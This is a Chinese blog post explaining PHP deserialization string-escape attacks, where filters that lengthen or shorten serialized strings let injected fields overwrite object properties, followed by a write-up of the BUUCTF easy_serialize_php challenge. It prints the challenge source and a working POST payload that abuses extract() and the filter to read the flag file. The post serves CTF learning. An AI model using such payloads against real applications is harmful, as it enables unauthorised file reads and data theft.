<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, shrink-to-fit=no">
    <meta name="referrer" content="origin">
    <meta http-equiv="Cache-Control" content="no-transform">
    <meta http-equiv="Cache-Control" content="no-siteapp">
    <title>
        
            php反序列化字符逃逸(buu [安洵杯 2019]easy_serialize_php)
        
    </title>
    <link rel="shortcut icon" href="#"/>

    <link type="text/css" rel="stylesheet" href="/font/LongCang.css">
    <link type="text/css" rel="stylesheet" href="/font/Monda.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSansSC.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSerifSC.css">
    <link type="text/css" rel="stylesheet" href="/font/Playball.css">
    <link type="text/css" rel="stylesheet" href="/font/PTMono.css">
    <link type="text/css" rel="stylesheet" href="/font/Roboto.css">
    <link type="text/css" rel="stylesheet" href="/font/RobotoSlab.css">
    <link type="text/css" rel="stylesheet" href="/font/Rosario.css">
    <link type="text/css" rel="stylesheet" href="/font/UbuntuMono.css">

    <link type="text/css" rel="stylesheet" href="/css/base.css">
    <link type="text/css" rel="stylesheet" href="/css/code.css">

    <script type="text/javascript" src="/js/jquery-3.4.1.min.js"></script>
<meta name="generator" content="Hexo 6.3.0"></head>
<body>
    <a id="cover"></a>
    <link type="text/css" rel="stylesheet" href="/css/post.css">
<div id="header" class="header">
    <div class="vertical">
        <div class="inner">
            
                <h1 class="header-subtitle">php反序列化字符逃逸(buu [安洵杯 2019]easy_serialize_php)</h1>
                <div class="header-subinfo">
                    <p class="article-info-text">
                        <span>
                            <i class="iconfont icon-time"></i> 发表时间：2022-09-17
                        </span>
                        
                            <span id="/2022/09/17/php反序列化字符逃逸/" class="leancloud_visitors" data-flag-title="php反序列化字符逃逸(buu [安洵杯 2019]easy_serialize_php)">
                                <i class="iconfont icon-browse"></i> 阅读：<sapn class="leancloud-visitors-count"></span>
                            </span>
                        
                        <span>
                            <i class="iconfont icon-interactive"></i> 评论：<span class="valine-comment-count" data-xid="/2022/09/17/php反序列化字符逃逸/"></span>
                        </span>  
                    </p>
                    
                    
                        
                            <span class="tag-color">ctfknowledge</span>
                        
                    
                </div>
            
        </div>
    </div>
    
</div>
<div id="container">
    
        <!-- 文章页面 -->
        <div id="article">
            <div class="toc"></div>
            <div class="article-body">
                <h3 id="php反序列化字符逃逸"><a href="#php反序列化字符逃逸" class="headerlink" title="php反序列化字符逃逸"></a>php反序列化字符逃逸</h3><p>一个学的很难受的一个点，看了一个多小时。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class Test &#123;</span><br><span class="line">  public $a = &quot;aa&quot;;</span><br><span class="line">  public $b = &quot;bbb&quot;;</span><br><span class="line">  public $c = &quot;cccc&quot;;</span><br><span class="line">&#125;</span><br><span class="line">$qwe = new Test();</span><br><span class="line">echo serialize($qwe);</span><br></pre></td></tr></table></figure>

<p>输出结果 <code>O:4:&quot;Test&quot;:3:&#123;s:1:&quot;a&quot;;s:2:&quot;aa&quot;;s:1:&quot;b&quot;;s:3:&quot;bbb&quot;;s:1:&quot;c&quot;;s:4:&quot;cccc&quot;;&#125;</code></p>
<p>现在我们可以自己测一下</p>
<blockquote>
<p>O:4:”Test”:3:{s:1:”a”;s:2:”aa”;s:1:”b”;s:3:”bbb”;s:1:”c”;s:4:”cccc”;}修改为O:4:”Test”:3:{s:1:”a”;s:2:”aa”;s:1:”b”;s:3:”bbb”;s:1:”c”;s:4:”cccc”;}hahhahha 并尝试反序列化</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">print_r(unserialize(&#x27;O:4:&quot;Test&quot;:3:&#123;s:1:&quot;a&quot;;s:2:&quot;aa&quot;;s:1:&quot;b&quot;;s:3:&quot;bbb&quot;;s:1:&quot;c&quot;;s:4:&quot;cccc&quot;;&#125;hahhaha&#x27;));</span><br></pre></td></tr></table></figure>
<p>可以很明显的看出来这两个两个语句反序列化之后得到的句子是一样的。那这样我们后面的字符就没有读到。<br>为什么没有读到呢。我用我自己对于php反序列化的理解来解释一下。<br>先假设一个O:4:”like”:3{s:1:”a”;s:2:”xx”;s:2:”aa”;s:4:”xxxx”;s:3:”aaa”;s:8:”xxxxxxxxx”}<br>对于php的反序列化，他一定会按照我们给的这个假设的序列化字符串去读.<br>例如，上面的，假定我们有一个过滤的函数，把我们的”x”这个字符给过滤了,O:4:”like”:3{s:1:”a”;s:2:””;s:2:”aa”;s:4:””;s:3:”aaa”;s:8:””},php还是会，一路读下去，等到了2这个地方，因为xx被过滤没了但是php依旧会去读 :” 后面的那2个字符，一读发现后面2个字符是 “; 然后php会找不到后面对应的字符来闭合，就会导致这个反序列化失败，我们可以自己试着去打印,会发现php它不会给输出，但是如果我们构造一些闭合的字符，然后再放一些我们自己的参数，我们就可以通过这来控制变量的值，从而实现php反序列化字符的逃逸。</p>
<p>因为php反序列化都是以 ;} 这个标志结尾,所以构建闭合的时候一点要构建出这个东西。</p>
<h5 id="1-关键字符变多"><a href="#1-关键字符变多" class="headerlink" title="1.关键字符变多"></a>1.关键字符变多</h5><p>ctf里面很多反序列化题目会使用<code>preg_replace</code>函数替换掉关键字符，使得关键字符增多或减少，首先介绍使关键字符增多的。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(__file__);</span><br><span class="line">function filter($str)&#123;</span><br><span class="line">    return str_replace(&#x27;l&#x27;, &#x27;ll&#x27;, $str);</span><br><span class="line">&#125;</span><br><span class="line">​</span><br><span class="line">class person&#123;</span><br><span class="line">    public $name = &#x27;lonmar&#x27;;</span><br><span class="line">    public $age = &#x27;100&#x27;;</span><br><span class="line">&#125;</span><br><span class="line">$test = new person();</span><br><span class="line">$test = serialize($test);</span><br><span class="line">echo &quot;&lt;/br&gt;&quot;;</span><br><span class="line">print_r($test);</span><br><span class="line">echo &quot;&lt;/br&gt;&quot;;</span><br><span class="line">$test = filter($test);</span><br><span class="line">print_r($test);</span><br><span class="line">print_r(unserialize($test));</span><br></pre></td></tr></table></figure>

<p>因为替换过后,实际长度为7,而描述长度为6,少读了一个r 所以失败</p>
<p>这种字符增多是反序列化失败是因为漏读了字符串的value,如果构造恶意的value,再故意漏读</p>
<p>如令$name&#x3D;’lonmar”;s:3:”age”;s:2:”35”;}’</p>
<p>如果再进行替换,lonmar&#x3D;&gt;llonmar,后面的}又读不到</p>
<p>再多几个l,lllllllllllllllllllllonmar&#x3D;&gt;llllllllllllllllllllllllllllllllllllllllllonmar ,”;s:3:”age”;s:2:”35”;}就又读不到</p>
<p>只能读到lllllllllllllllllllllonmar这样后面的;s:3:”age”;s:2:”35”;}就逃逸掉了,逃逸掉的字符串可以把原来后面的正常序列化数据提前闭合掉.(闭合条件”;}</p>
<p>;s:3:”age”;s:2:”35”;}长度是22 , 所以只需要22个l.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">function filter($str)&#123;</span><br><span class="line">    return str_replace(&#x27;l&#x27;, &#x27;ll&#x27;, $str);</span><br><span class="line">&#125;</span><br><span class="line">​</span><br><span class="line">class person&#123;</span><br><span class="line">    public $name = &#x27;llllllllllllllllllllllonmar&quot;;s:3:&quot;age&quot;;s:2:&quot;35&quot;;&#125;&#x27;;</span><br><span class="line">    public $age = &#x27;100&#x27;;</span><br><span class="line">&#125;</span><br><span class="line">$test = new person();</span><br><span class="line">$test = serialize($test);</span><br><span class="line">var_dump($test);</span><br><span class="line">$test = filter($test);</span><br><span class="line">var_dump($test);</span><br><span class="line">var_dump(unserialize($test));</span><br></pre></td></tr></table></figure>
<p>可以观察到age变成了35, name不是llllllllllllllllllllllllllllllllllllllllllllonmar”;s:3:”age”;s:2:”35”;} 而是 llllllllllllllllllllllllllllllllllllllllllllonmar 因为;s:3:”age”;s:2:”35”;}逃逸,之后终止标志变成了;s:3:”age”;s:2:”35”;}里的;} 后面的就被忽略了。</p>
<p>关键字变多，这里一般就直接使用一个变量，因为关键字的变多，直接把后面的挤出去，然后让其他变量读我们所设定的值。</p>
<h5 id="2-关键字符减少"><a href="#2-关键字符减少" class="headerlink" title="2.关键字符减少"></a>2.关键字符减少</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(__file__);</span><br><span class="line">function filter($str)&#123;</span><br><span class="line">    return str_replace(&#x27;ll&#x27;, &#x27;l&#x27;, $str);</span><br><span class="line">&#125;</span><br><span class="line">​</span><br><span class="line">class person&#123;</span><br><span class="line">    public $name = &#x27;lonmar&#x27;;</span><br><span class="line">    public $age = &#x27;100&#x27;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>同样的,如果构造恶意的age,让反序列化的时候多读,把age一部分读进去 同样可以达到某种目的</p>
<p>正常的数据 O:6:”person”:2:{s:4:”name”;s:6:”lonmar”;s:3:”age”;s:3:”xxx”;}</p>
<p>如果做替换,让也”;s:3:”age”;s:3:”被读进name,再把xxx替换为;s:3:”age”;s:3:”100”;}</p>
<blockquote>
<p>令$age&#x3D;123”;s:3:”age”;s:3:”100”;}<br>O:6:”person”:2:{s:4:”name”;s:47:”llllllllllllllllllllllllllllllllllllllllllonmar”;s:3:”age”;s:26:”123”;s:3:”age”;s:3:”111”;}”;}<br>多读的为 “;s:3:”age”;s:26:”123 长度 21<br>构造(l*42)nmar, 就多吞了部分字符串,<br>name:<br>llllllllllllllllllllllllllllllllllllllllllonmar &#x3D;&gt;<br>lllllllllllllllllllllonmar”;s:3:”age”;s:26:”123<br>age:<br>123”;s:3:”age”;s:3:”111”;}<br>&#x3D;&gt;<br>111</p>
</blockquote>
<p>关键字减少可能需要多个变量一起赋值,这里就是让$name多吞掉一些字符,而$age恶意构造</p>
<h5 id="buu-安洵杯-2019-easy-serialize-php"><a href="#buu-安洵杯-2019-easy-serialize-php" class="headerlink" title="buu [安洵杯 2019]easy_serialize_php"></a>buu [安洵杯 2019]easy_serialize_php</h5><p>拿一道题来举个例子</p>
<p>这题上来直接给源码，直接点就去。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$function = @$_GET[&#x27;f&#x27;];</span><br><span class="line"></span><br><span class="line">function filter($img)&#123;</span><br><span class="line">    $filter_arr = array(&#x27;php&#x27;,&#x27;flag&#x27;,&#x27;php5&#x27;,&#x27;php4&#x27;,&#x27;fl1g&#x27;);</span><br><span class="line">    $filter = &#x27;/&#x27;.implode(&#x27;|&#x27;,$filter_arr).&#x27;/i&#x27;;</span><br><span class="line">    return preg_replace($filter,&#x27;&#x27;,$img);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if($_SESSION)&#123;</span><br><span class="line">    unset($_SESSION);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$_SESSION[&quot;user&quot;] = &#x27;guest&#x27;;</span><br><span class="line">$_SESSION[&#x27;function&#x27;] = $function;</span><br><span class="line"></span><br><span class="line">extract($_POST);</span><br><span class="line"></span><br><span class="line">if(!$function)&#123;</span><br><span class="line">    echo &#x27;&lt;a href=&quot;index.php?f=highlight_file&quot;&gt;source_code&lt;/a&gt;&#x27;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if(!$_GET[&#x27;img_path&#x27;])&#123;</span><br><span class="line">    $_SESSION[&#x27;img&#x27;] = base64_encode(&#x27;guest_img.png&#x27;);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    $_SESSION[&#x27;img&#x27;] = sha1(base64_encode($_GET[&#x27;img_path&#x27;]));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$serialize_info = filter(serialize($_SESSION));</span><br><span class="line"></span><br><span class="line">if($function == &#x27;highlight_file&#x27;)&#123;</span><br><span class="line">    highlight_file(&#x27;index.php&#x27;);</span><br><span class="line">&#125;else if($function == &#x27;phpinfo&#x27;)&#123;</span><br><span class="line">    eval(&#x27;phpinfo();&#x27;); //maybe you can find something in here!</span><br><span class="line">&#125;else if($function == &#x27;show_image&#x27;)&#123;</span><br><span class="line">    $userinfo = unserialize($serialize_info);</span><br><span class="line">    echo file_get_contents(base64_decode($userinfo[&#x27;img&#x27;]));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这个题，第一啊，有一个变量覆盖，<br><code>$_SESSION[&quot;user&quot;] = &#39;guest&#39;;$_SESSION[&#39;function&#39;] = $function;</code><br>虽然它设定了值,但是有个<code>extract()</code>函数</p>
<p>这个函数的用法 看我的php那篇文章，如果我们这里传_SESSION[user]&#x3D;”XXXX”&amp;_SESSION[function]&#x3D;”xxxxx”,就可以把它直接给这些设定的值给覆盖，就可以执行我们的php反序列化字符逃逸</p>
<p>img_path一看就不能传值</p>
<p>他说phpinfo()有提示，去看看。<br><img src="https://cdn.jsdelivr.net/gh/Daylovef/image@main/image/dongman/ty001.png"><br>看到了一个执行完这个php便会执行的文件。flag必在这。</p>
<p>接着看 function必须是show_image</p>
<p>需要让 img 为 d0g3_f1ag.php 并且有个base64的decode，传入的时候需要base64编码一下</p>
<p>session的反序列化 最后我们要逃逸的字符是;s:3:”img”;s:20:”ZDBnM19mMWFnLnBocA&#x3D;&#x3D;”;s:1:”a”;s:1:”1”;}<br>假设我们要传session[user]和session[function]<br>O:3:{s:4:”user”;s:xxx:xxxx;s:8:”function”;s:xxxx:xxxxx;s:3:”img”;s:20:”ZDBnM19mMWFnLnBocA&#x3D;&#x3D;”;}<br>这里的xxx我们需要自己构建，<br>目标O:3:{s:4:”user”;s:xxx:”xxxx”;s:3:”img”;s:20:”ZDBnM19mMWFnLnBocA&#x3D;&#x3D;”;s:1:”a”;s:1:”1”;}<br>后面是为了确保反序列化成功添加的参数<br>传入O:3:{s:4:”user”;s:xxx:”xxxx”;s:8:”function”;s:57:”;s:3:”img”;s:20:”ZDBnM19mMWFnLnBocA&#x3D;&#x3D;”;s:1:”a”;s:1:”1”;}”;}<br>要吃掉的是哪些字符很明显了,有22个字符 <code>&quot;;s:8:&quot;function&quot;;s:57:</code><br>吃掉之后会发现有分号;得补上<br>那就 给user 4个flag2个php</p>
<p>所以payload是post <code>_SESSION[user]=flagflagflagflagphpphp&amp;_SESSION[function]=;s:3:&quot;img&quot;;s:20:&quot;ZDBnM19mMWFnLnBocA==&quot;;s:1:&quot;a&quot;;s:1:&quot;1&quot;;&#125;</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image@main/image/dongman/tyoo2.png"></p>
<p>还不出答案，再解码，再访问</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image@main/image/dongman/ty003.png"></p>
<p>flag到手</p>

                
                <p class="end">__END__</p>
            </div>
            <div class="article-footer">
                <div class="suffix-box">
    <div class="suffix-box-left">
        <img src="/image/sidebar/-f128e7dd768b5.jpg" alt="懒羊羊">
    </div>
    <div class="suffix-box-right">
        <span class="suffix-box-title">文章作者：</span>懒羊羊
        <br>
        <span class="suffix-box-title">文章出处：</span><a href="/2022/09/17/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8/" target="_blank">php反序列化字符逃逸(buu [安洵杯 2019]easy_serialize_php)</a>
        <br>
        <span class="suffix-box-title">作者签名：</span>简单地活着, 肆意又精彩.
        <br>
        <span class="suffix-box-title">关于主题：</span><a href="https://github.com/first19326/Hexo-LiveForCode" target="_blank">Hexo - Live For Code</a>
        <br>
        <span class="suffix-box-title">版权声明：</span>文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" title="BY-NC-SA" target="_blank">BY-NC-SA</a> 许可协议，转载请注明出处
        <br>
    </div>
    <div style="clear: both;"></div>
</div>
                
                
                    <div class="tag">
                        标签：
                        
                            <a href="/tags/ctfknowledge/">ctfknowledge</a>
                        
                    </div>
                
                <div class="article-prev-next">
                    
                        <a href="/2022/09/21/buu-HFCTF2020-EasyLogin-%E5%92%8C-jwt%E6%A6%82%E5%BF%B5/" class="prev-prefix">« </a> 上一篇：    <a href="/2022/09/21/buu-HFCTF2020-EasyLogin-%E5%92%8C-jwt%E6%A6%82%E5%BF%B5/" title="发布于 2022-09-21 07:35">buu [HFCTF2020]EasyLogin 和 jwt概念</a>
                        <br>
                    
                    
                        <a href="/2022/09/16/hexo-github%E6%8C%87%E4%BB%A4/" class="next-prefix">» </a> 下一篇：    <a href="/2022/09/16/hexo-github%E6%8C%87%E4%BB%A4/" title="发布于 2022-09-16 09:51">hexo+github指令</a>
                    
                </div>
            </div>
            
    <div class="article-comments">
        
            <div class="comments-title">
                评论列表
            </div>
        
        <div class="comments-content"></div>
    </div>

        </div>
    
</div>
    <div id="footer"></div>
    <div id="sidebar">
    <div class="menu-wrap" style="display:none;">
        
            <div class="menu-notice">
                <span class="iconfont icon-notice"></span>
                <div class="notice">
                    <span>简单地活着，肆意而又精彩！</span>
                </div>
            </div>
        
        <nav class="menu">
            <div class="menu-introduce"> 
                <div class="introduce-avatar">
                    <img src="/image/sidebar/-f128e7dd768b5.jpg">
                </div> 
                <div class="introduce-info"> 
                    <div class="introduce-user"><span>懒羊羊</span></div>
                </div> 
            </div> 
            <div class="menu-list">
                <ul>
                    
                        <li class=""><a href="/" class="" target="_self"><span class="iconfont icon-home-fill"></span>首页</a></li>
                    
                        <li class=""><a href="/category" class="" target="_self"><span class="iconfont icon-folder-fill"></span>分类</a></li>
                    
                        <li class=""><a href="/tag" class="" target="_self"><span class="iconfont icon-discount-fill"></span>标签</a></li>
                    
                        <li class=""><a href="/archive" class="" target="_self"><span class="iconfont icon-calendar-fill"></span>归档</a></li>
                    
                        <li class=""><a href="/donate" class="" target="_self"><span class="iconfont icon-heart-fill"></span>赞赏</a></li>
                    
                        <li class=""><a href="/about" class="" target="_self"><span class="iconfont icon-about-fill"></span>关于</a></li>
                    
                        <li class=""><a href="/atom.xml" class="" target="_blank"><span class="iconfont icon-rss"></span>订阅</a></li>
                    
                        <li class=""><a href="javascript:;" class="search" target="_self"><span class="iconfont icon-search-menu"></span>搜索</a></li>
                    
                        <li class=""><a href="/comment" class="" target="_self"><span class="iconfont icon-comments-fill"></span>留言板</a></li>
                    
                        <li class=""><a href="/friend" class="" target="_self"><span class="iconfont icon-link"></span>友情链接</a></li>
                    
                </ul> 
            </div> 
            <div class="menu-link">
                <div class="box">
                    <div class="image-box"></div>
                </div>
                
                    <a name="知乎" href="https://zhihu.com/people/worstone-29" class="" target="_blank" data=""><span class="iconfont icon-zhihu"></span></a>
                
                    <a name="微博" href="https://weibo.com/u/5749847477" class="" target="_blank" data=""><span class="iconfont icon-weibo"></span></a>
                
                    <a name="QQ" href="javascript:;" class="image" target="_self" data="/image/sidebar/qq.png"><span class="iconfont icon-qq"></span></a>
                
                    <a name="微信" href="javascript:;" class="" target="_self" data=""><span class="iconfont icon-wechat"></span></a>
                
                    <a name="GitHub" href="https://github.com/first19326" class="" target="_blank" data=""><span class="iconfont icon-github"></span></a>
                
            </div> 
        </nav>
        <button class="menu-button-close"></button>
        <div class="morph-shape" id="morph-shape" data-morph-open="M-7.312,0H15c0,0,66,113.339,66,399.5C81,664.006,15,800,15,800H-7.312V0z;M-7.312,0H100c0,0,0,113.839,0,400c0,264.506,0,400,0,400H-7.312V0z">
            <svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 100 800" preserveAspectRatio="none">
                <path d="M-7.312,0H0c0,0,0,113.839,0,400c0,264.506,0,400,0,400h-7.312V0z"/>
            </svg>
        </div>
    </div>
    <button class="menu-button-open">MENU</button>
    <div class="menu-cover"></div>
</div>
    <link type="text/css" rel="stylesheet" href="/css/search.css">
<script type="text/javascript" src="/js/iscroll.js"></script>
<script type="text/javascript" src="/js/instantsearch.min.js"></script>
<div class="search-window">
    <div class="search-content">
        <div class="search-content-icon">
            <i class="iconfont icon-search"></i>
        </div>
        <div id="search-input" class="search-input"></div>
    </div>

    <div class="search-scroll">
        <div class="search-result">
            <div id="search-stats" class="search-stats"></div>
            <div id="search-hits"></div>
            <div id="search-pagination" class="search-pagination"></div>
        </div>
    </div>

    <span class="search-close-icon">
        <i class="iconfont icon-close"></i>
    </span>
</div>
    <div id="tools">
    <div class="progressbar-top"></div>

    
        <link type="text/css" rel="stylesheet" href="/css/APlayer.css">
        <script type="text/javascript" src="/js/APlayer.min.js"></script>
        <script type="text/javascript" src="/js/Meting.min.js"></script>
        <meting-js id="3778678" lrcshow="false" server="netease" type="playlist" fixed="true" autoplay="false" loop="all" order="random" preload="auto" volume="0.67" mutex="true"></meting-js>
    
    
    <div class="wrap-right">
        <div class="setting">
            <div class="iconbox favorites" switch="false">
                <span class="iconfont icon-favorites"></span>
                <span class="icontext">关注</span>
            </div>
            <div class="iconbox mode">
                <div class="light">
                    <span class="iconfont icon-daymode"></span>
                    <span class="icontext">浅色模式</span>
                </div>
                <div class="dark">
                    <span class="iconfont icon-nightmode-fill"></span>
                    <span class="icontext">深色模式</span>
                </div>
            </div>
            <a href="javascript:;" target="_self" class="search">
                <div class="iconbox">
                    <span class="iconfont icon-search-menu"></span>
                    <span class="icontext">搜索</span>
                </div>
            </a>
            <div class="iconbox bottom">
                <div style="display: inline-block; transform: rotate(180deg);">
                    <span class="iconfont icon-top"></span>
                </div>
                <span class="icontext">跳至底部</span>
            </div>
        </div>
        <div class="iconbox set">
            <div style="display: inline-block;">
                <span class="iconfont icon-setting"></span>
            </div>
            <span class="icontext">设置</span>
        </div>
        <div class="iconbox top">
            <span class="iconfont icon-top"></span>
            <span class="icontext">返回顶部</span>
        </div>
    </div>
    <div class="loading"></div>
</div>
    <script>
    window.config = {
        GitHubUserName     : "Daylovef",
        GitHubRepositories : "Hexo-LiveForCode",

        User             : "懒羊羊",
        UserAvatar       : "/image/sidebar/-f128e7dd768b5.jpg",
        WebsiteStartDate : "2020-01-01",

        WebsiteTitleBlur         : "(◍´꒳`◍) FYL is my girlfriend",
        WebsiteTitleBlurTimeOut  : 500,
        WebsiteTitleFocus        : "(*´∇｀*) 欢迎回来!",
        WebsiteTitleFocusTimeOut : 1000,
        WebsiteFavicon           : "/image/website/logo.png",

        ProgressBar : {
            id       : "topProgressBar",
            color    : "#77B6FF",
            height   : "2px",
            duration : 0.2
        },

        Loading: {
            rebound : {
                tension  : 16,
                friction : 5
            },
            spinner : {
                id     : "spinner",
                radius : 90,
                sides  : 3,
                depth  : 4,
                colors : {
                    background : "#F0F0F0",
                    stroke     : "#272633",
                    base       : "",
                    child      : "#272633"
                },
                alwaysForward : true,
                restAt        : 0.5,
                renderBase    : false
            }
        },

        HomeHeaderAnimationRendered : true,
        HomeHeaderAnimation         : {
            radius      : 15,
            density     : 0.2,
            color       : "rgba(255, 255, 255, .2)",
            clearOffset : 0.3
        },

        BackAnimationRendered          : true,
        IEBrowserBackAnimationRendered : false,
        BackAnimation                  : {
            colorSaturation  : "60%",
            colorBrightness  : "50%",
            colorAlpha       : 0.5,
            colorCycleSpeed  : 5,
            verticalPosition : "random",
            horizontalSpeed  : 200,
            ribbonCount      : 3,
            strokeSize       : 0,
            parallaxAmount   : -0.2,
            animateSections  : true
        },

        HomeHeaderImage : [
            
                "/image/header/51c6d5c3154ea2f0.jpg",
            
                "/image/header/home.jpg",
            
                "/image/header/home.jpeg",
            
        ],
        HomeBannerText  : "",

        ArticleHeaderImage : [
            
                "/image/header/article.jpg",
            
        ],

        OtherBannerText : "",

        Error : {
            icon    : "icon-swimming",
            title   : "PAGE NOT FOUND",
            content : [
                
                    "很抱歉，您访问的页面不存在！",
                
                    "可能是输入地址有误或该地址已变更。",
                
            ],
            buttons : [
                
                    {
                        icon  : "icon-home",
                        text  : "返回首页",
                        href  : "/",
                        class : ""
                    },
                
            ]
        },

        MenuNotice : {
            enable : true,
            notice : "简单地活着，肆意而又精彩！",
            speed  : 20
        },
        MenuList : [
            
                {
                    name   : "首页",
                    icon   : "icon-home-fill",
                    href   : "/",
                    type   : "index",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "分类",
                    icon   : "icon-folder-fill",
                    href   : "/category",
                    type   : "category",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "标签",
                    icon   : "icon-discount-fill",
                    href   : "/tag",
                    type   : "tag",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "归档",
                    icon   : "icon-calendar-fill",
                    href   : "/archive",
                    type   : "archive",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "赞赏",
                    icon   : "icon-heart-fill",
                    href   : "/donate",
                    type   : "donate",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "关于",
                    icon   : "icon-about-fill",
                    href   : "/about",
                    type   : "about",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "订阅",
                    icon   : "icon-rss",
                    href   : "/atom.xml",
                    type   : "",
                    class  : "",
                    target : "_blank"
                },
            
                {
                    name   : "搜索",
                    icon   : "icon-search-menu",
                    href   : "javascript:;",
                    type   : "",
                    class  : "search",
                    target : "_self"
                },
            
                {
                    name   : "留言板",
                    icon   : "icon-comments-fill",
                    href   : "/comment",
                    type   : "comment",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "友情链接",
                    icon   : "icon-link",
                    href   : "/friend",
                    type   : "friend",
                    class  : "",
                    target : "_self"
                },
            
        ],
        MenuLink : [
            
                
                    {
                        name   : "知乎",
                        icon   : "icon-zhihu",
                        href   : "https://zhihu.com/people/worstone-29",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
                    {
                        name   : "微博",
                        icon   : "icon-weibo",
                        href   : "https://weibo.com/u/5749847477",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
                    {
                        name   : "QQ",
                        icon   : "icon-qq",
                        href   : "javascript:;",
                        class  : "image",
                        target : "_self",
                        image  : "/image/sidebar/qq.png"
                    },
                
                    {
                        name   : "微信",
                        icon   : "icon-wechat",
                        href   : "javascript:;",
                        class  : "",
                        target : "_self",
                        image  : ""
                    },
                
                    {
                        name   : "GitHub",
                        icon   : "icon-github",
                        href   : "https://github.com/first19326",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
            
        ],

        FooterStyle : 2,
        BottomText  : "<div><span class='face'>ღゝ◡╹)ノ♡</span></div><div>【人生若只如初见<span><i class='iconfont icon-like-fill'></i></span>何事秋风悲画扇】</div><div>&copy; 2020-2022 WorstOne. All Rights Reserved.</div>",

        ConsoleList : [
            
                
                    [
                        
                            
                                "Based on cnblogs theme SimpleMemory.",
                            
                                "",
                            
                        
                    ],
                
                    [
                        
                            
                                "SimpleMemory Author:",
                            
                                "BNDong",
                            
                        
                    ],
                
                    [
                        
                            
                                "Theme:",
                            
                                "LiveForCode",
                            
                        
                    ],
                
            
        ],

        FontIconExtend : "",

        Donate : {
            paypal  : "",
            bitcoin : "",
            alipay  : "/image/donate/alipay.png",
            wechat  : "/image/donate/wechat.png"
        },

        Search : {
            applicationID : "010C3EANT8",
            apiKey        : "c7abab9f11b79102b9aff7fe6d41447d",
            indexName     : "Notes",
            hits          : {
                page : 10
            },
            labels        : {
                placeholder : "搜索",
                empty       : "未发现与 「${query}」 相关的内容",
                stats       : "${hits} 条相关条目，使用了 ${time} 毫秒",
            }
        }, 

        Valine : {
            switch         : true,
            el             : ".comments-content",
